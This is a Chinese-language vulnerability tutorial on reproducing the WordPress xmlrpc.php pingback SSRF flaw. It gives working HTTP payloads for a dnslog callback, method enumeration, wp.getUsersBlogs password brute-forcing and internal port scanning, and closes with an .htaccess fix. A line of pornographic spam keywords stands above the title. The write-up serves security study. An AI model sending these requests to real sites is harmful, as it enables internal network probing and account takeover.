欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

復現(xiàn)WordPress?xmlrpc.php漏洞和SSRF的詳細步驟

 更新時間:2022年04月02日 15:45:15   作者:xiaochuhe.  
這篇文章主要介紹了復現(xiàn)WordPress?xmlrpc.php漏洞和SSRF的相關資料,本文給大家介紹的非常詳細,對大家的學習或工作具有一定的參考借鑒價值,需要的朋友可以參考下

一、漏洞介紹

通過Pingback可以實現(xiàn)的服務器端請求偽造 (Server-side request forgery,SSRF)和遠程端口掃描。

二、漏洞影響

WordPress 版本< 3.5.1

造成的影響
1、可以對業(yè)務內(nèi)網(wǎng)進行探測。
2、攻擊運行在內(nèi)網(wǎng)或本地的應用程序(比如溢出攻擊)。
3、利用file協(xié)議讀取本地文件等

三、漏洞復現(xiàn)

第一步:直接訪問這個文件,初步判斷

第二步:發(fā)現(xiàn)POC驗證數(shù)據(jù)包 

POST /xmlrpc.php HTTP/1.1
Host: www.目標.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 310
 
<?xml version="1.0" encoding="iso-8859-1"?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>http://g8o53x.dnslog.cn/</string></value></param>
    <param><value><string>http://www.目標.com/?p=1</string></value></param>
    </params>
    </methodCall>

發(fā)送數(shù)據(jù)包

驗證成功 !

四、深入利用

(一)查看系統(tǒng)允許的方法

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
......
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

 (二)賬號爆破

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
......
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>password</value></param>
</params>
</methodCall>

(三)通過Pingback可以實現(xiàn)的服務器端請求偽造 (Server-side request forgery,SSRF)和遠程端口掃描。

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
.......
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>要探測的ip和端口:http://127.0.0.1:80</string></value>
</param><param><value><string>要探測的URL</string>
</value></param></params>
</methodCall>

五、漏洞修復

(一)通過APACHE的.htaccess屏蔽xmlrpc.php文件的訪問。配置代碼如下:

# protect xmlrpc
<Files "xmlrpc.php">
Order Allow,Deny
Deny from all
</Files>

(二)刪除根目錄下的xmlrpc.php。

到此這篇關于復現(xiàn)WordPress xmlrpc.php漏洞和SSRF的文章就介紹到這了,更多相關WordPress漏洞復現(xiàn)內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關文章希望大家以后多多支持腳本之家!

相關文章

最新評論